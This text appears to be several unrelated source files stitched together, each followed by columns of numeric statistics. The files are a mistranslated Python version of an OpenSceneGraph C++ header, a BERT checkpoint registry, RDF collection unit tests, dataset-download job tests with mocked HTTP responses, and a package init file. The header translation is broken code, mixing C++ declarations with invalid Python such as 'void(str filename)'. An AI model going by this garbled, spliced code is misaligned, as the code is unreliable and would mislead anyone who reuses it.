# Translated from file 'StereoPass.h'
# -*- Mode: C++ tab-width: 4 indent-tabs-mode: t c-basic-offset: 4 -*-
# OpenSceneGraph example, osgstereomatch.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#ifndef STEREOPASS_H
#define STEREOPASS_H 1
#include <osg/ref_ptr>
#include <osg/Group>
#include <osg/Camera>
#include <osg/MatrixTransform>
#include <osg/Projection>
#include <osg/Geode>
#include <osg/Geometry>
#include <osg/Texture2D>
#include <osg/TextureRectangle>
class StereoPass :
StereoPass(osg.TextureRectangle *left_tex,
osg.TextureRectangle *right_tex,
int width, int height,
int min_disparity, int max_disparity, int window_size)
~StereoPass()
def getRoot():
return _RootGroup
def getOutputTexture():
return _OutTexture
setShader = void(str filename)
createTexturedQuad = osg.Group()
createOutputTextures = void()
setupCamera = void()
_RootGroup = osg.Group()
_Camera = osg.Camera()
_InTextureLeft = osg.TextureRectangle()
_InTextureRight = osg.TextureRectangle()
_OutTexture = osg.TextureRectangle()
_TextureWidth = int()
_TextureHeight = int()
_MinDisparity = int()
_MaxDisparity = int()
_WindowSize = int()
_FragmentProgram = osg.Program()
_StateSet = osg.StateSet()
#endif #STEREOPASS_H
if __name__ == "__main__":
main(sys.argv)
| 34.294566
| 224
| 0.735817
| 4,275
| 35,975
| 6.019181
| 0.103158
| 0.016478
| 0.022657
| 0.016788
| 0.782916
| 0.755091
| 0.736554
| 0.71106
| 0.700295
| 0.681797
| 0
| 0.015145
| 0.161251
| 35,975
| 1,048
| 225
| 34.32729
| 0.837642
| 0
| 0
| 0.653094
| 0
| 0.001629
| 0.037422
| 0.005922
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.100977
| 0.006515
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
5acc1a258df4b7f3aa86827b57dee3a97e19e28d
| 1,783
|
py
|
Python
|
current_models.py
|
ph10m/coref
|
88152e6bf63b5b8f9a0d7146f4235a2ce6b55e43
|
[
"Apache-2.0"
] | 376
|
2019-08-27T15:49:37.000Z
|
2022-03-29T19:37:04.000Z
|
current_models.py
|
ph10m/coref
|
88152e6bf63b5b8f9a0d7146f4235a2ce6b55e43
|
[
"Apache-2.0"
] | 90
|
2019-08-27T20:02:04.000Z
|
2022-02-23T10:00:25.000Z
|
current_models.py
|
ph10m/coref
|
88152e6bf63b5b8f9a0d7146f4235a2ce6b55e43
|
[
"Apache-2.0"
] | 109
|
2019-09-02T08:20:23.000Z
|
2022-03-04T23:18:39.000Z
|
# Registry of coref evaluation checkpoints: short nickname ->
# (HuggingFace-style base model category, checkpoint path).
# NOTE(review): the paths are cluster-local (/checkpoint/...) and presumably
# only resolvable on the original training cluster — confirm before use.
CURRENT_MODELS = {
'google_large_cased': ('bert-large-cased', '/checkpoint/danqi/coref_eval/bert_models/cased_L-24_H-1024_A-16/bert_model.ckpt'),
'small_batch_random': ('bert-large-cased', '/checkpoint/omerlevy/span_bert_models/cased/random/checkpoint_best.pt'),
'small_batch_no_nsp_random': ('bert-large-cased', '/checkpoint/omerlevy/mandar_data/pretraining_models/no_nsp_random/checkpoint_best.pt'),
'small_batch_no_nsp_pair': ('bert-large-cased', '/checkpoint/omerlevy/mandar_data/pretraining_models/no_nsp_pair/checkpoint_best.pt'),
'small_batch_no_nsp_pair_1.2m': ('bert-large-cased', '/checkpoint/omerlevy/mandar_data/pretraining_models/no_nsp_pair/checkpoint_37_1200000.pt'),
'small_batch_no_nsp_geo_1.2m': ('bert-large-cased', '/checkpoint/omerlevy/slow_models/geo/checkpoint_37_1200000.pt'),
'small_batch_random_1.2m': ('bert-large-cased', '/checkpoint/omerlevy/span_bert_models/cased/random/checkpoint_27_1200000.pt'),
'small_batch_geo_1.2m': ('bert-large-cased', '/checkpoint/omerlevy/mandar_data/pretraining_models/geo_span_0.2/checkpoint_27_1200000.pt'),
'small_batch_np_1.2m': ('bert-large-cased', '/checkpoint/omerlevy/mandar_data/pretraining_models/np_span/checkpoint_27_1200000.pt'),
'small_batch_ner_1.2m': ('bert-large-cased', '/checkpoint/omerlevy/mandar_data/pretraining_models/ner_span/checkpoint_27_1200000.pt'),
'small_batch_word_1.2m': ('bert-large-cased', '/checkpoint/omerlevy/mandar_data/pretraining_models/word/checkpoint_27_1200000.pt')
}
# Maps a model category name to the directory name used by the Google BERT
# releases (cased/uncased, L=layers, H=hidden size, A=attention heads).
MODEL_CAT_TO_GOOGLE_DIR = {'bert-base-cased': 'cased_L-12_H-768_A-12', 'bert-base-uncased': 'uncased_L-12_H-768_A-12', 'bert-large-cased': 'cased_L-24_H-1024_A-16', 'bert-large-uncased': 'uncased_L-24_H-1024_A-16', 'bert-base-uncased-1024': 'uncased_L-12_H-768_A-12'}
| 104.882353
| 267
| 0.784072
| 278
| 1,783
| 4.636691
| 0.179856
| 0.100853
| 0.130334
| 0.20481
| 0.802172
| 0.798293
| 0.708301
| 0.59969
| 0.469356
| 0.469356
| 0
| 0.075829
| 0.053281
| 1,783
| 16
| 268
| 111.4375
| 0.687796
| 0
| 0
| 0
| 0
| 0
| 0.839506
| 0.650393
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5aec9107e40e26a669fd4711c24550ca879e198b
| 7,389
|
py
|
Python
|
test/programytest/rdf/test_matching.py
|
motazsaad/fit-bot-fb-clt
|
580477aa1ec91855b621d9ae276f2705962f6a87
|
[
"MIT"
] | null | null | null |
test/programytest/rdf/test_matching.py
|
motazsaad/fit-bot-fb-clt
|
580477aa1ec91855b621d9ae276f2705962f6a87
|
[
"MIT"
] | null | null | null |
test/programytest/rdf/test_matching.py
|
motazsaad/fit-bot-fb-clt
|
580477aa1ec91855b621d9ae276f2705962f6a87
|
[
"MIT"
] | 4
|
2019-04-01T15:42:23.000Z
|
2020-11-05T08:14:27.000Z
|
import unittest
from programy.rdf.collection import RDFCollection
class RDFCollectionMatchingTests(unittest.TestCase):
    """Tests for RDFCollection triple matching and removal.

    Every test seeds the collection with the same five ANIMALS triples
    (see ``add_data``) and then filters with ``matched_as_tuples`` or
    prunes with ``remove`` using some combination of subject, predicate
    and object.
    """

    def add_data(self, collection):
        """Seed *collection* with the five animal triples shared by all tests."""
        collection.add_entity("MONKEY", "LEGS", "2", "ANIMALS")
        collection.add_entity("MONKEY", "HASFUR", "true", "ANIMALS")
        collection.add_entity("ZEBRA", "LEGS", "4", "ANIMALS")
        collection.add_entity("BIRD", "LEGS", "2", "ANIMALS")
        collection.add_entity("ELEPHANT", "TRUNK", "true", "ANIMALS")

    def test_all_as_tuples(self):
        """all_as_tuples() returns every stored triple."""
        collection = RDFCollection()
        self.assertIsNotNone(collection)
        self.add_data(collection)
        triples = collection.all_as_tuples()
        self.assertIsNotNone(triples)
        self.assertEqual(5, len(triples))
        self.assertIn(["MONKEY", "LEGS", "2"], triples)
        self.assertIn(["MONKEY", "HASFUR", "true"], triples)
        self.assertIn(["ZEBRA", "LEGS", "4"], triples)
        self.assertIn(["BIRD", "LEGS", "2"], triples)
        self.assertIn(["ELEPHANT", "TRUNK", "true"], triples)

    def test_match_all_as_tuples(self):
        """matched_as_tuples() with no filters matches every triple."""
        collection = RDFCollection()
        self.assertIsNotNone(collection)
        self.add_data(collection)
        matched = collection.matched_as_tuples()
        self.assertIsNotNone(matched)
        self.assertEqual(5, len(matched))
        self.assertIn(["MONKEY", "LEGS", "2"], matched)
        self.assertIn(["MONKEY", "HASFUR", "true"], matched)
        self.assertIn(["ZEBRA", "LEGS", "4"], matched)
        self.assertIn(["BIRD", "LEGS", "2"], matched)
        self.assertIn(["ELEPHANT", "TRUNK", "true"], matched)

    def test_match_all_as_tuples_subject(self):
        """Filtering by subject keeps only that subject's triples."""
        collection = RDFCollection()
        self.assertIsNotNone(collection)
        self.add_data(collection)
        matched = collection.matched_as_tuples(subject="MONKEY")
        self.assertIsNotNone(matched)
        self.assertEqual(2, len(matched))
        self.assertIn(["MONKEY", "LEGS", "2"], matched)
        self.assertIn(["MONKEY", "HASFUR", "true"], matched)

    def test_match_all_as_tuples_subject_predicate(self):
        """Filtering by subject and predicate narrows to a single triple."""
        collection = RDFCollection()
        self.assertIsNotNone(collection)
        self.add_data(collection)
        matched = collection.matched_as_tuples(subject="MONKEY", predicate="LEGS")
        self.assertIsNotNone(matched)
        self.assertEqual(1, len(matched))
        self.assertIn(["MONKEY", "LEGS", "2"], matched)

    def test_match_all_as_tuples_subject_predicate_object(self):
        """A fully-specified triple matches exactly itself."""
        collection = RDFCollection()
        self.assertIsNotNone(collection)
        self.add_data(collection)
        matched = collection.matched_as_tuples(subject="MONKEY", predicate="LEGS", obj="2")
        self.assertIsNotNone(matched)
        self.assertEqual(1, len(matched))
        self.assertIn(["MONKEY", "LEGS", "2"], matched)

    def test_match_all_as_tuples_predicate(self):
        """Filtering by predicate matches across subjects."""
        collection = RDFCollection()
        self.assertIsNotNone(collection)
        self.add_data(collection)
        matched = collection.matched_as_tuples(predicate="LEGS")
        self.assertIsNotNone(matched)
        self.assertEqual(3, len(matched))
        self.assertIn(["MONKEY", "LEGS", "2"], matched)
        self.assertIn(["ZEBRA", "LEGS", "4"], matched)
        self.assertIn(["BIRD", "LEGS", "2"], matched)

    def test_match_all_as_tuples_predicate_object(self):
        """Filtering by predicate and object matches all two-legged animals."""
        collection = RDFCollection()
        self.assertIsNotNone(collection)
        self.add_data(collection)
        matched = collection.matched_as_tuples(predicate="LEGS", obj="2")
        self.assertIsNotNone(matched)
        self.assertEqual(2, len(matched))
        self.assertIn(["MONKEY", "LEGS", "2"], matched)
        self.assertIn(["BIRD", "LEGS", "2"], matched)

    def test_match_as_tuples_subject_object(self):
        """Filtering by subject and object ignores the predicate."""
        collection = RDFCollection()
        self.assertIsNotNone(collection)
        self.add_data(collection)
        matched = collection.matched_as_tuples(subject="MONKEY", obj="2")
        self.assertIsNotNone(matched)
        self.assertEqual(1, len(matched))
        self.assertIn(["MONKEY", "LEGS", "2"], matched)

    def test_remove_subject(self):
        """remove() by subject drops every triple for that subject."""
        collection = RDFCollection()
        self.assertIsNotNone(collection)
        self.add_data(collection)
        triples = collection.all_as_tuples()
        remains = collection.remove(triples, subject='MONKEY')
        self.assertIsNotNone(remains)
        self.assertEqual(3, len(remains))
        self.assertIn(["ZEBRA", "LEGS", "4"], remains)
        self.assertIn(["BIRD", "LEGS", "2"], remains)
        self.assertIn(["ELEPHANT", "TRUNK", "true"], remains)

    def test_remove_subject_predicate(self):
        """remove() by subject and predicate drops only the one matching triple."""
        collection = RDFCollection()
        self.assertIsNotNone(collection)
        self.add_data(collection)
        triples = collection.all_as_tuples()
        remains = collection.remove(triples, subject='MONKEY', predicate="LEGS")
        self.assertIsNotNone(remains)
        self.assertEqual(4, len(remains))
        self.assertIn(["MONKEY", "HASFUR", "true"], remains)
        self.assertIn(["ZEBRA", "LEGS", "4"], remains)
        self.assertIn(["BIRD", "LEGS", "2"], remains)
        self.assertIn(["ELEPHANT", "TRUNK", "true"], remains)

    def test_remove_subject_object(self):
        """remove() by subject and object drops only the matching triple.

        Fixed: the membership assertions previously checked the unfiltered
        ``all`` list (vacuously true); they now check ``remains``.
        """
        collection = RDFCollection()
        self.assertIsNotNone(collection)
        self.add_data(collection)
        triples = collection.all_as_tuples()
        remains = collection.remove(triples, subject='MONKEY', obj="2")
        self.assertIsNotNone(remains)
        self.assertEqual(4, len(remains))
        self.assertIn(["MONKEY", "HASFUR", "true"], remains)
        self.assertIn(["ZEBRA", "LEGS", "4"], remains)
        self.assertIn(["BIRD", "LEGS", "2"], remains)
        self.assertIn(["ELEPHANT", "TRUNK", "true"], remains)

    def test_remove_predicate(self):
        """remove() by predicate drops all LEGS triples."""
        collection = RDFCollection()
        self.assertIsNotNone(collection)
        self.add_data(collection)
        triples = collection.all_as_tuples()
        remains = collection.remove(triples, predicate='LEGS')
        self.assertIsNotNone(remains)
        self.assertEqual(2, len(remains))
        self.assertIn(["MONKEY", "HASFUR", "true"], remains)
        self.assertIn(["ELEPHANT", "TRUNK", "true"], remains)

    def test_remove_predicate_object(self):
        """remove() by predicate and object drops the two-legged animals.

        Fixed: the membership assertions previously checked the unfiltered
        ``all`` list (vacuously true); they now check ``remains``.
        """
        collection = RDFCollection()
        self.assertIsNotNone(collection)
        self.add_data(collection)
        triples = collection.all_as_tuples()
        remains = collection.remove(triples, predicate='LEGS', obj="2")
        self.assertIsNotNone(remains)
        self.assertEqual(3, len(remains))
        self.assertIn(["MONKEY", "HASFUR", "true"], remains)
        self.assertIn(["ZEBRA", "LEGS", "4"], remains)
        self.assertIn(["ELEPHANT", "TRUNK", "true"], remains)

    def test_remove_object(self):
        """remove() by object alone drops every triple whose object matches."""
        collection = RDFCollection()
        self.assertIsNotNone(collection)
        self.add_data(collection)
        triples = collection.all_as_tuples()
        remains = collection.remove(triples, obj='2')
        self.assertIsNotNone(remains)
        self.assertEqual(3, len(remains))
        self.assertIn(["MONKEY", "HASFUR", "true"], remains)
        self.assertIn(["ZEBRA", "LEGS", "4"], remains)
        self.assertIn(["ELEPHANT", "TRUNK", "true"], remains)
| 35.018957
| 91
| 0.639329
| 795
| 7,389
| 5.811321
| 0.057862
| 0.118182
| 0.069264
| 0.093939
| 0.929004
| 0.92013
| 0.89329
| 0.871861
| 0.871861
| 0.865368
| 0
| 0.007988
| 0.220598
| 7,389
| 210
| 92
| 35.185714
| 0.794235
| 0
| 0
| 0.717105
| 0
| 0
| 0.090552
| 0
| 0
| 0
| 0
| 0
| 0.532895
| 1
| 0.098684
| false
| 0
| 0.013158
| 0
| 0.118421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
51b9bd0039914bec707746990c6e9b98ee9400ab
| 15,612
|
py
|
Python
|
packages/gtmcore/gtmcore/dataset/tests/test_background_jobs.py
|
jjwatts/gigantum-client
|
88ce0475fb6880322bdd06d987c494e29064f278
|
[
"MIT"
] | null | null | null |
packages/gtmcore/gtmcore/dataset/tests/test_background_jobs.py
|
jjwatts/gigantum-client
|
88ce0475fb6880322bdd06d987c494e29064f278
|
[
"MIT"
] | null | null | null |
packages/gtmcore/gtmcore/dataset/tests/test_background_jobs.py
|
jjwatts/gigantum-client
|
88ce0475fb6880322bdd06d987c494e29064f278
|
[
"MIT"
] | null | null | null |
import os
import pytest
import uuid
from aioresponses import aioresponses
import snappy
from mock import patch
from gtmcore.configuration import Configuration
from gtmcore.dataset.io.manager import IOManager
from gtmcore.dataset.manifest import Manifest
from gtmcore.dispatcher import jobs
from gtmcore.fixtures import mock_config_file
from gtmcore.fixtures.datasets import helper_append_file, helper_compress_file
from gtmcore.inventory.inventory import InventoryManager
class TestDatasetBackgroundJobs(object):
    """Tests for the dataset-file download background job.

    Each test creates a dataset with two small files, compresses the
    backing objects out of the local object cache, then mocks the
    Gigantum object service with ``aioresponses`` and drives
    ``jobs.download_dataset_files`` to restore them.
    """
    def test_download_dataset_files(self, mock_config_file):
        """Download the two files one key at a time and verify their content."""
        im = InventoryManager(mock_config_file[0])
        ds = im.create_dataset('default', 'default', "dataset100", storage_type="gigantum_object_v1", description="100")
        m = Manifest(ds, 'default')
        iom = IOManager(ds, m)
        os.makedirs(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, "other_dir"))
        helper_append_file(m.cache_mgr.cache_root, m.dataset_revision, "test1.txt", "asdfadfsdf")
        helper_append_file(m.cache_mgr.cache_root, m.dataset_revision, "test2.txt", "fdsfgfd")
        m.sweep_all_changes()
        obj_to_push = iom.objects_to_push()
        assert len(obj_to_push) == 2
        _, obj_id_1 = obj_to_push[0].object_path.rsplit('/', 1)
        _, obj_id_2 = obj_to_push[1].object_path.rsplit('/', 1)
        obj1_target = obj_to_push[0].object_path
        obj2_target = obj_to_push[1].object_path
        obj1_source = os.path.join('/tmp', uuid.uuid4().hex)
        obj2_source = os.path.join('/tmp', uuid.uuid4().hex)
        assert os.path.exists(obj1_target) is True
        assert os.path.exists(obj2_target) is True
        # Move the cached objects aside as compressed copies so the job has
        # something to "download" back into the cache.
        helper_compress_file(obj1_target, obj1_source)
        helper_compress_file(obj2_target, obj2_source)
        assert os.path.isfile(obj1_target) is False
        assert os.path.isfile(obj2_target) is False
        assert os.path.isfile(obj1_source) is True
        assert os.path.isfile(obj2_source) is True
        # Clear out from linked dir
        os.remove(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test1.txt'))
        os.remove(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test2.txt'))
        with patch.object(Configuration, 'find_default_config', lambda self: mock_config_file[0]):
            with aioresponses() as mocked_responses:
                # Mock the presigned-URL lookup and the object download
                # for both objects.
                mocked_responses.get(f'https://api.gigantum.com/object-v1/{ds.namespace}/{ds.name}/{obj_id_1}',
                                     payload={
                                         "presigned_url": f"https://dummyurl.com/{obj_id_1}?params=1",
                                         "namespace": ds.namespace,
                                         "obj_id": obj_id_1,
                                         "dataset": ds.name
                                     },
                                     status=200)
                with open(obj1_source, 'rb') as data1:
                    mocked_responses.get(f"https://dummyurl.com/{obj_id_1}?params=1",
                                         body=data1.read(), status=200,
                                         content_type='application/octet-stream')
                mocked_responses.get(f'https://api.gigantum.com/object-v1/{ds.namespace}/{ds.name}/{obj_id_2}',
                                     payload={
                                         "presigned_url": f"https://dummyurl.com/{obj_id_2}?params=1",
                                         "namespace": ds.namespace,
                                         "obj_id": obj_id_2,
                                         "dataset": ds.name
                                     },
                                     status=200)
                with open(obj2_source, 'rb') as data2:
                    mocked_responses.get(f"https://dummyurl.com/{obj_id_2}?params=1",
                                         body=data2.read(), status=200,
                                         content_type='application/octet-stream')
                # First pass: request only test1.txt.
                dl_kwargs = {
                    'logged_in_username': "default",
                    'access_token': "asdf",
                    'id_token': "1234",
                    'dataset_owner': "default",
                    'dataset_name': "dataset100",
                    'labbook_owner': None,
                    'labbook_name': None,
                    'all_keys': False,
                    'keys': ["test1.txt"]
                }
                result = jobs.download_dataset_files(**dl_kwargs)
                assert os.path.isfile(obj1_target) is True
                assert os.path.isfile(obj2_target) is False
                # Verify the restored object matches the compressed source.
                decompressor = snappy.StreamDecompressor()
                with open(obj1_source, 'rb') as dd:
                    source1 = decompressor.decompress(dd.read())
                    source1 += decompressor.flush()
                with open(obj1_target, 'rt') as dd:
                    dest1 = dd.read()
                assert source1.decode("utf-8") == dest1
                # Download other file
                dl_kwargs = {
                    'logged_in_username': "default",
                    'access_token': "asdf",
                    'id_token': "1234",
                    'dataset_owner': "default",
                    'dataset_name': "dataset100",
                    'labbook_owner': None,
                    'labbook_name': None,
                    'all_keys': False,
                    'keys': ["test2.txt"]
                }
                jobs.download_dataset_files(**dl_kwargs)
                assert os.path.isfile(obj1_target) is True
                assert os.path.isfile(obj2_target) is True
                with open(obj1_source, 'rb') as dd:
                    source1 = decompressor.decompress(dd.read())
                    source1 += decompressor.flush()
                with open(obj1_target, 'rt') as dd:
                    dest1 = dd.read()
                assert source1.decode("utf-8") == dest1
                with open(obj2_source, 'rb') as dd:
                    source1 = decompressor.decompress(dd.read())
                    source1 += decompressor.flush()
                with open(obj2_target, 'rt') as dd:
                    dest1 = dd.read()
                assert source1.decode("utf-8") == dest1
    def test_download_dataset_files_all(self, mock_config_file):
        """Download both files in a single all_keys=True run and verify content."""
        im = InventoryManager(mock_config_file[0])
        ds = im.create_dataset('default', 'default', "dataset100", storage_type="gigantum_object_v1", description="100")
        m = Manifest(ds, 'default')
        iom = IOManager(ds, m)
        os.makedirs(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, "other_dir"))
        helper_append_file(m.cache_mgr.cache_root, m.dataset_revision, "test1.txt", "asdfadfsdf")
        helper_append_file(m.cache_mgr.cache_root, m.dataset_revision, "test2.txt", "fdsfgfd")
        m.sweep_all_changes()
        obj_to_push = iom.objects_to_push()
        assert len(obj_to_push) == 2
        _, obj_id_1 = obj_to_push[0].object_path.rsplit('/', 1)
        _, obj_id_2 = obj_to_push[1].object_path.rsplit('/', 1)
        obj1_target = obj_to_push[0].object_path
        obj2_target = obj_to_push[1].object_path
        obj1_source = os.path.join('/tmp', uuid.uuid4().hex)
        obj2_source = os.path.join('/tmp', uuid.uuid4().hex)
        assert os.path.exists(obj1_target) is True
        assert os.path.exists(obj2_target) is True
        # Move the cached objects aside as compressed copies.
        helper_compress_file(obj1_target, obj1_source)
        helper_compress_file(obj2_target, obj2_source)
        assert os.path.isfile(obj1_target) is False
        assert os.path.isfile(obj2_target) is False
        assert os.path.isfile(obj1_source) is True
        assert os.path.isfile(obj2_source) is True
        # Clear out from linked dir
        os.remove(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test1.txt'))
        os.remove(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test2.txt'))
        with patch.object(Configuration, 'find_default_config', lambda self: mock_config_file[0]):
            with aioresponses() as mocked_responses:
                mocked_responses.get(f'https://api.gigantum.com/object-v1/{ds.namespace}/{ds.name}/{obj_id_1}',
                                     payload={
                                         "presigned_url": f"https://dummyurl.com/{obj_id_1}?params=1",
                                         "namespace": ds.namespace,
                                         "obj_id": obj_id_1,
                                         "dataset": ds.name
                                     },
                                     status=200)
                with open(obj1_source, 'rb') as data1:
                    mocked_responses.get(f"https://dummyurl.com/{obj_id_1}?params=1",
                                         body=data1.read(), status=200,
                                         content_type='application/octet-stream')
                mocked_responses.get(f'https://api.gigantum.com/object-v1/{ds.namespace}/{ds.name}/{obj_id_2}',
                                     payload={
                                         "presigned_url": f"https://dummyurl.com/{obj_id_2}?params=1",
                                         "namespace": ds.namespace,
                                         "obj_id": obj_id_2,
                                         "dataset": ds.name
                                     },
                                     status=200)
                with open(obj2_source, 'rb') as data2:
                    mocked_responses.get(f"https://dummyurl.com/{obj_id_2}?params=1",
                                         body=data2.read(), status=200,
                                         content_type='application/octet-stream')
                # all_keys=True pulls every file in one job run.
                dl_kwargs = {
                    'logged_in_username': "default",
                    'access_token': "asdf",
                    'id_token': "1234",
                    'dataset_owner': "default",
                    'dataset_name': "dataset100",
                    'labbook_owner': None,
                    'labbook_name': None,
                    'all_keys': True,
                    'keys': None
                }
                result = jobs.download_dataset_files(**dl_kwargs)
                assert os.path.isfile(obj1_target) is True
                assert os.path.isfile(obj2_target) is True
                assert os.path.isfile(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test1.txt')) is True
                assert os.path.isfile(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test2.txt')) is True
                # Both restored objects must match their compressed sources.
                decompressor = snappy.StreamDecompressor()
                with open(obj1_source, 'rb') as dd:
                    source1 = decompressor.decompress(dd.read())
                    source1 += decompressor.flush()
                with open(obj1_target, 'rt') as dd:
                    dest1 = dd.read()
                assert source1.decode("utf-8") == dest1
                with open(obj2_source, 'rb') as dd:
                    source1 = decompressor.decompress(dd.read())
                    source1 += decompressor.flush()
                with open(obj2_target, 'rt') as dd:
                    dest1 = dd.read()
                assert source1.decode("utf-8") == dest1
    def test_download_dataset_files_error(self, mock_config_file):
        """A failed (HTTP 400) presigned-URL lookup aborts the job with SystemExit.

        The first object still downloads; the second must remain missing.
        """
        im = InventoryManager(mock_config_file[0])
        ds = im.create_dataset('default', 'default', "dataset100", storage_type="gigantum_object_v1", description="100")
        m = Manifest(ds, 'default')
        iom = IOManager(ds, m)
        os.makedirs(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, "other_dir"))
        helper_append_file(m.cache_mgr.cache_root, m.dataset_revision, "test1.txt", "asdfadfsdf")
        helper_append_file(m.cache_mgr.cache_root, m.dataset_revision, "test2.txt", "fdsfgfd")
        m.sweep_all_changes()
        obj_to_push = iom.objects_to_push()
        assert len(obj_to_push) == 2
        _, obj_id_1 = obj_to_push[0].object_path.rsplit('/', 1)
        _, obj_id_2 = obj_to_push[1].object_path.rsplit('/', 1)
        obj1_target = obj_to_push[0].object_path
        obj2_target = obj_to_push[1].object_path
        obj1_source = os.path.join('/tmp', uuid.uuid4().hex)
        obj2_source = os.path.join('/tmp', uuid.uuid4().hex)
        assert os.path.exists(obj1_target) is True
        assert os.path.exists(obj2_target) is True
        # Move the cached objects aside as compressed copies.
        helper_compress_file(obj1_target, obj1_source)
        helper_compress_file(obj2_target, obj2_source)
        assert os.path.isfile(obj1_target) is False
        assert os.path.isfile(obj2_target) is False
        assert os.path.isfile(obj1_source) is True
        assert os.path.isfile(obj2_source) is True
        # Clear out from linked dir
        os.remove(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test1.txt'))
        os.remove(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test2.txt'))
        with patch.object(Configuration, 'find_default_config', lambda self: mock_config_file[0]):
            with aioresponses() as mocked_responses:
                mocked_responses.get(f'https://api.gigantum.com/object-v1/{ds.namespace}/{ds.name}/{obj_id_1}',
                                     payload={
                                         "presigned_url": f"https://dummyurl.com/{obj_id_1}?params=1",
                                         "namespace": ds.namespace,
                                         "obj_id": obj_id_1,
                                         "dataset": ds.name
                                     },
                                     status=200)
                with open(obj1_source, 'rb') as data1:
                    mocked_responses.get(f"https://dummyurl.com/{obj_id_1}?params=1",
                                         body=data1.read(), status=200,
                                         content_type='application/octet-stream')
                # Second lookup fails with HTTP 400; no body mock is registered.
                mocked_responses.get(f'https://api.gigantum.com/object-v1/{ds.namespace}/{ds.name}/{obj_id_2}',
                                     payload={
                                         "presigned_url": f"https://dummyurl.com/{obj_id_2}?params=1",
                                         "namespace": ds.namespace,
                                         "obj_id": obj_id_2,
                                         "dataset": ds.name
                                     },
                                     status=400)
                dl_kwargs = {
                    'logged_in_username': "default",
                    'access_token': "asdf",
                    'id_token': "1234",
                    'dataset_owner': "default",
                    'dataset_name': "dataset100",
                    'labbook_owner': None,
                    'labbook_name': None,
                    'all_keys': True,
                    'keys': None
                }
                with pytest.raises(SystemExit):
                    jobs.download_dataset_files(**dl_kwargs)
                assert os.path.isfile(obj1_target) is True
                assert os.path.isfile(obj2_target) is False
                assert os.path.isfile(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test1.txt')) is True
                assert os.path.isfile(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test2.txt')) is False
| 49.405063
| 120
| 0.525813
| 1,721
| 15,612
| 4.532249
| 0.08774
| 0.037692
| 0.046154
| 0.055385
| 0.932949
| 0.929487
| 0.929487
| 0.929487
| 0.929487
| 0.929487
| 0
| 0.028646
| 0.364976
| 15,612
| 315
| 121
| 49.561905
| 0.75812
| 0.006213
| 0
| 0.874046
| 0
| 0.022901
| 0.145455
| 0.007737
| 0
| 0
| 0
| 0
| 0.145038
| 1
| 0.01145
| false
| 0
| 0.049618
| 0
| 0.064886
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfd54e84078c56570d85041bef69b063c44e69eb
| 44
|
py
|
Python
|
shapes/__init__.py
|
vtlim/shapes
|
d8d7ad053be2200757cbfd4039aeb2f5f5dc0f2f
|
[
"MIT"
] | null | null | null |
shapes/__init__.py
|
vtlim/shapes
|
d8d7ad053be2200757cbfd4039aeb2f5f5dc0f2f
|
[
"MIT"
] | 1
|
2018-02-16T00:11:14.000Z
|
2018-02-16T00:11:14.000Z
|
shapes/__init__.py
|
vtlim/shapes
|
d8d7ad053be2200757cbfd4039aeb2f5f5dc0f2f
|
[
"MIT"
] | null | null | null |
from . import square
from . import triangle
| 14.666667
| 22
| 0.772727
| 6
| 44
| 5.666667
| 0.666667
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 44
| 2
| 23
| 22
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
